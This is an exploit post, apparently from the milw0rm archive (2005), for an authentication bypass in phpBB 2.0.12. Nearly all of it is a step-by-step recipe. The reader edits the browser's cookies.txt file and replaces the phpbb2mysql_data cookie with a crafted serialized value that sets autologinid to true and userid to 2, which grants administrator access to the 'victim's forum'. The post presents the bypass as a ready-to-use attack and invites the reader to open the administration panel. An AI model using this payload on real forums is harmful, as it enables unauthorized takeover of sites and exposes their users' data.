phpBB 2.0.12 Session Handling Authentication Bypass ..
easy to use exploit ..
** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..
1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:
3- Close the Browser ..
2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example ;)
and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor
3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//
save the cookies.txt..
4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !! :D
complete the mission by clicking " Go to Administration Panel "
--------------------------------------------------------------------------------
written by : Ali7
e-mail : ali7@hotmail.co.uk
# milw0rm.com [2005-03-11]